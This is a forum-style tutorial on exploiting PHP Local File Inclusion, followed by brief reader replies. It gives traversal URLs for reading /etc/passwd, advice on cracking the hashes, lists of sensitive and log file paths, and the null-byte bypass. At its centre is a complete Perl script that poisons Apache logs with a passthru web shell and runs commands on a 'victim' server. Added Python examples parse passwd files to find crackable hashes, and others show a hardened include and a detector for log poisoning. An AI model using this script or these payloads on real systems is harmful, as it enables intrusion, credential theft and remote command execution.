This tutorial will guide you through the process of exploiting a website through LFI (Local File Inclusion).
First let's take a look at PHP code that is vulnerable to LFI:
 Code: 
<?php
$page = $_GET['page'];   // taken straight from the query string, never checked
include($page);          // whatever path the user supplied is read and run as PHP
?>
Now, this is a piece of code that should NEVER be used: $page is not sanitized and is passed directly to include(), so the user decides which file the server reads and executes. Unfortunately (or not) it is very common to find in the wild.
Ok, now that we know why it is vulnerable, let's use it to our advantage. First let's look at how this gives us the ability to "browse" through the web server. Imagine there is a file called test.php inside the test directory. If you type victim.com/test/test.php you retrieve that file, correct? But if the PHP code we examined is in index.php, we can also retrieve that file through victim.com/index.php?page=test/test.php. See what happened there? Now, if index.php is at victim.com/test/index.php and test.php is at victim.com/test.php, you have to type victim.com/test/index.php?page=../test.php. The ../ is called directory traversal; a relative include is resolved against the directory of the script doing the including, and each ../ takes you one directory up from there.
Now that we can go up and down through the server, let's use it to access files we are not supposed to see. If the site is hosted on a Unix server we can then possibly view the password file; to do this type something like this (the number of ../ may vary depending on where the vulnerable file is, but ../ past the root directory is simply ignored, so overshooting does no harm):
Code:
victim.com/index.php?page=../../../../../../../etc/passwd
If you don't know what to do with the content of /etc/passwd then continue reading! /etc/passwd is where the user accounts (and, on old systems, the password hashes) are stored. A non-shadowed passwd file has one line per user with this layout:
Code:
username:passwd:UID:GID:full_name:directory:shell
For example:
Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
All you need to do then is grab the username and crack the hash. Note that the second field is a crypt(3) hash, not an encoding: it cannot be decoded, only guessed with a password cracker (dictionary or brute force). If the passwd file is shadowed you'll see something like this:
Code:
username:x:503:100:FullName:/home/username:/bin/sh
As you can see the password field is now an x and the hash lives in /etc/shadow. You will probably not have access to /etc/shadow, because it is readable only by root (or the shadow group), while /etc/passwd has to be readable by many processes; that's why you have access to it.
You can also sometimes see something like this:
Code:
username:!:503:100:FullName:/home/username:/bin/sh
On AIX the ! means the hash is stored in /etc/security/passwd instead. On Linux a ! or * in this field means the account is locked and has no usable password, so there is nothing to crack.
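A small parser for the passwd format just described, added here as an example (it is not code from the original tutorial). It splits each line into the seven fields, tells you where the password for each account actually lives, and names the crypt(3) scheme of any hash that is sitting in the file, which is what you need to know before feeding it to a cracker. SAMPLE_PASSWD is constructed for illustration; the hash on the "legacy" line is the one from the text above.

```python
import re

# Added example, not code from the original tutorial. SAMPLE_PASSWD is a
# constructed file: five real-looking entries plus one malformed line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
legacy:kbeMVnZM0oL7I:503:100:FullName:/home/legacy:/bin/sh
shadowed:x:503:100:FullName:/home/shadowed:/bin/sh
aixuser:!:504:100:FullName:/home/aixuser:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
this line is not a passwd entry
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

# crypt(3) formats you may meet in the password field
_DESCRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")          # traditional DES, 13 chars
_MODULAR = {"$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt",
            "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_passwd(text):
    """One dict per well-formed line; anything without seven fields is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            continue
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def hash_type(field):
    """Name the crypt(3) scheme of a hash, or None if the field is not a hash."""
    if _DESCRYPT.match(field):
        return "descrypt"
    for prefix, name in _MODULAR.items():
        if field.startswith(prefix):
            return name
    return None


def classify(entry):
    """Where the password for this entry actually lives."""
    p = entry["passwd"]
    if p == "x":
        return "shadowed"   # hash is in /etc/shadow, root-only
    if p in ("!", "*", "!!"):
        return "not_here"   # AIX: hash in /etc/security/passwd; Linux: account locked
    if p == "":
        return "empty"      # no password at all
    return "hash" if hash_type(p) else "unknown"


def crackable(entries):
    """(user, hash, scheme) for every entry whose hash is readable right here."""
    return [(e["name"], e["passwd"], hash_type(e["passwd"]))
            for e in entries if classify(e) == "hash"]


if __name__ == "__main__":
    for e in parse_passwd(SAMPLE_PASSWD):
        print(f'{e["name"]:10} uid={e["uid"]:<5} {classify(e)}')
    print("crackable:", crackable(SAMPLE_PASSWD and parse_passwd(SAMPLE_PASSWD)))
```

Run against a passwd file pulled through the LFI, only the entries reported as "hash" are worth a cracker's time; everything marked "shadowed" needs /etc/shadow, which the include normally cannot reach.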
Here are a couple of places that may be interesting to "visit" (the /etc/security/* files and mkuser.default are AIX-specific):
Code:
 /etc/passwd 
 /etc/shadow 
 /etc/group 
 /etc/security/group 
 /etc/security/passwd 
 /etc/security/user 
 /etc/security/environ 
 /etc/security/limits 
 /usr/lib/security/mkuser.default 
You will probably need to google what each of these contains, as this is not the right tutorial for it.
Just one more quick thing, it's also common to find vulnerable code like:
Code:
<?php
$page = $_GET["page"];
include("$page.php");   // the suffix is appended to whatever the user sent
?>
In this case, as you can see, it will add .php to the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?page=../../../../../../../../etc/passwd
it will try to include:
../../../../../../../../etc/passwd.php
That file doesn't exist, so you will see an error message (or nothing at all), and you need to apply the null byte (%00):
Code:
victim.com/index.php?page=../../../../../../../../etc/passwd%00
The web server decodes %00 into a NUL byte before PHP sees it. PHP before 5.3.4 handed the path to the C open() call, which stops at the first NUL, so everything after %00 was ignored. PHP 5.3.4 and later reject any file path containing a NUL byte, so on a current server the null byte trick fails with an error instead of dropping the suffix.
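To make the path mechanics above concrete, here is an added example (not code from the original tutorial) that emulates how include() resolves the page parameter: plain traversal, the appended .php suffix, and the null byte on old versus current PHP. It also shows the hardened form, where the parameter selects an entry in a fixed table and is never used as a path. DOCROOT and the PAGES table are assumed; nothing here touches the real filesystem.

```python
import posixpath
from urllib.parse import unquote

# Added example, not code from the original tutorial. DOCROOT is an assumed
# web root (the directory of the including script); no real files are opened.
DOCROOT = "/var/www/html"


def resolve_include(page_param, suffix="", null_byte_truncates=False):
    """Path PHP would try to open for include($page . $suffix).

    page_param is the raw query-string value; the web server percent-decodes
    it (so %00 becomes a NUL byte) before PHP sees it in $_GET.
    null_byte_truncates=True models PHP before 5.3.4, where the path went to
    the C open() call, which stops at the first NUL. Later versions reject
    the path outright, modelled here by returning None.
    """
    raw = unquote(page_param) + suffix
    if "\x00" in raw:
        if not null_byte_truncates:
            return None
        raw = raw.split("\x00", 1)[0]
    # A relative include is resolved against the including script's
    # directory; normpath collapses the ../ segments the way the kernel does,
    # and ../ beyond / is simply dropped, so overshooting costs nothing.
    return posixpath.normpath(posixpath.join(DOCROOT, raw))


# Hardened form: the parameter is a key into a fixed table of known pages.
# The table itself is an assumed site layout.
PAGES = {"home": "home.php", "about": "about.php"}


def safe_include(page_param):
    target = PAGES.get(unquote(page_param))
    if target is None:
        return None
    full = posixpath.normpath(posixpath.join(DOCROOT, target))
    # Defence in depth: even a bad table entry cannot leave the web root.
    return full if full.startswith(DOCROOT + "/") else None


if __name__ == "__main__":
    for page, suffix, old_php in [
        ("test/test.php", "", False),
        ("../../../../../../../etc/passwd", "", False),
        ("../../../etc/passwd", ".php", False),
        ("../../../etc/passwd%00", ".php", True),
        ("../../../etc/passwd%00", ".php", False),
    ]:
        print(f"{page + suffix:40} -> {resolve_include(page, suffix, old_php)}")
    print("safe_include('home')      ->", safe_include("home"))
    print("safe_include('../passwd') ->", safe_include("../../../etc/passwd"))
```

The last two lines of the demo are the point of the hardened version: a traversal string is not a key in the table, so it never becomes a path at all, and the startswith() check catches a mistake in the table itself.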
There are other ways to use an LFI, so continue reading, the REALLY fun part is about to begin!
We will now try to run commands on the server. We will do this by injecting PHP code into the httpd logs and then including the log file through the LFI! To do this, first find out where the logs are stored; here are some locations that may be useful to you:
Code:
 ../apache/logs/error.log 
 ../apache/logs/access.log 
 ../../apache/logs/error.log 
 ../../apache/logs/access.log 
 ../../../apache/logs/error.log 
 ../../../apache/logs/access.log 
../../../../../../../etc/httpd/logs/access_log
 ../../../../../../../etc/httpd/logs/access.log 
 ../../../../../../../etc/httpd/logs/error_log 
 ../../../../../../../etc/httpd/logs/error.log 
 ../../../../../../../var/www/logs/access_log 
 ../../../../../../../var/www/logs/access.log 
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
 ../../../../../../../var/log/apache/access_log 
 ../../../../../../../var/log/apache2/access_log 
 ../../../../../../../var/log/apache/access.log 
 ../../../../../../../var/log/apache2/access.log 
 ../../../../../../../var/log/access_log 
 ../../../../../../../var/log/access.log 
 ../../../../../../../var/www/logs/error_log 
 ../../../../../../../var/www/logs/error.log 
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
 ../../../../../../../var/log/apache/error_log 
 ../../../../../../../var/log/apache2/error_log 
 ../../../../../../../var/log/apache/error.log 
 ../../../../../../../var/log/apache2/error.log 
 ../../../../../../../var/log/error_log 
 ../../../../../../../var/log/error.log 
Ok, now that you know where the logs are, take a look at them and see what they store. In this example we will use a log that records "not found" requests and the PHP code <? passthru($_GET[cmd]) ?>. You would then type victim.com/<? passthru($_GET[cmd]) ?> in your browser, and the PHP code gets logged because the file "doesn't exist".
This probably won't work, because if you look in the log you will see the PHP code like this:
Code:
%3C?%20passthru($_GET[cmd])%20?%3E
Your browser URL-encodes the whole thing, so the included log contains harmless text instead of a PHP tag. You need something that sends the request raw; if you don't have a script of your own you can use this Perl script I wrote. It puts the code both in the request line and in the User-Agent header, since the User-Agent is written to the access log whatever path was requested, and it uses the long <?php tag because short_open_tag is often disabled.
Code:
#!/usr/bin/perl -w
use strict;
use IO::Socket;

# Edit these for the target: host, directory of the vulnerable script,
# the script name plus its parameter, and the log file to include.
my $site   = "victim.com";
my $path   = "/folder/";
my $script = "index.php?page=";
my $code   = "<?php passthru(\$_GET[cmd]) ?>";
my $log    = "../../../../../../../etc/httpd/logs/error_log";

# Percent-encode a command so spaces, & and friends survive the query string.
sub urlencode {
    my $s = shift;
    $s =~ s/([^A-Za-z0-9_.~-])/sprintf("%%%02X", ord($1))/ge;
    return $s;
}

sub connect_to {
    my $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $site, PeerPort => "80")
        or die "\nConnection Failed.\n\n";
    return $s;
}

sub read_cmd {
    print "Type command to run or exit to end: ";
    my $c = <STDIN>;
    return undef unless defined $c;
    chomp($c);
    return $c;
}

print "Trying to inject the code\n";
my $socket = connect_to();
# The request is written by hand so the PHP tag is sent raw; a normal HTTP
# client would percent-encode it. The same code goes into User-Agent, which
# lands in the access log regardless of what happens to the request line.
print $socket "GET ".$path.$code." HTTP/1.1\r\n";
print $socket "User-Agent: ".$code."\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code sent; if the request was logged it is now in $log\n\n";

my $cmd = read_cmd();
while (defined $cmd && $cmd ne "exit") {
    $socket = connect_to();
    # Include the poisoned log through the LFI and pass the command as cmd=
    print $socket "GET ".$path.$script.$log."&cmd=".urlencode($cmd)." HTTP/1.1\r\n";
    print $socket "Host: ".$site."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\r\n";
    while (my $show = <$socket>) {
        print $show;
    }
    close($socket);
    $cmd = read_cmd();
}
Copy/paste that, save it as whatever.pl and change the variables at the top according to your victim site. If the vulnerable code is in victim.com/main/test.php you should change /folder/ to /main/, index.php to test.php in the request that includes the log, and ../../../../../../../etc/httpd/logs/error_log to where the log is at! The script will inject the code and then ask you for a command to run on the server.
Now do what you want.
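The same chain seen from the defender's side, as an added example that is not part of the original tutorial: a scan over Apache combined-format access log lines that flags PHP tags landing in the log (the poisoning step), traversal and null bytes in the include parameter, and an include that points at a log file, then ties the poisoning and the log include together per client address. SAMPLE_LOG is a constructed log; the addresses are documentation ranges and the request lines follow the attack described above.

```python
import re
from urllib.parse import unquote

# Added example, not code from the original tutorial. SAMPLE_LOG is a
# constructed Apache combined-format access log reproducing the attack:
# a probe, a passwd read, the poisoning request, the command execution,
# and a percent-encoded traversal with a null byte from a second client.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /<?php passthru($_GET[cmd]) ?> HTTP/1.1" 404 209 "-" "<?php passthru($_GET[cmd]) ?>"
203.0.113.5 - - [10/Oct/2023:13:56:09 +0000] "GET /index.php?page=../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1893 "-" "curl/7.88.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php|=)?\s")        # an opening PHP tag
TRAVERSAL = re.compile(r"\.\.[/\\]")             # ../ or ..\ after decoding
LOG_FILE = re.compile(r"(?:access|error)[_.]log", re.I)


def analyze(log_text):
    """Return one finding per suspicious line: {ip, ts, reasons}."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode once so we judge what the server saw, not what was typed;
        # the User-Agent header is logged verbatim and needs no decoding.
        req, ua = unquote(m["req"]), m["ua"]
        reasons = []
        if PHP_TAG.search(req) or PHP_TAG.search(ua):
            reasons.append("php_in_log")
        if TRAVERSAL.search(req):
            reasons.append("traversal")
        if "\x00" in req:
            reasons.append("null_byte")
        if TRAVERSAL.search(req) and LOG_FILE.search(req):
            reasons.append("log_include")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "reasons": reasons})
    return findings


def poisoned_then_included(findings):
    """Client addresses that wrote PHP into the log and then included a log
    file through the LFI: the complete chain rather than a lone probe."""
    poisoned = set()
    hits = set()
    for f in findings:  # findings keep log order, so 'then' is meaningful
        if "php_in_log" in f["reasons"]:
            poisoned.add(f["ip"])
        if "log_include" in f["reasons"] and f["ip"] in poisoned:
            hits.add(f["ip"])
    return hits


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f'{f["ip"]:14} {f["ts"]}  {", ".join(f["reasons"])}')
    print("full chain from:", sorted(poisoned_then_included(found)))
```

Two details matter in practice: decode the request line before matching, otherwise the %2e%2e%2f form slips past a plain ../ check, and look at the User-Agent as well as the path, because that header is the attacker's most reliable way into access_log.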
 
good

This is so basic that it's not the same in the wild according to this "guide"

Nice

very good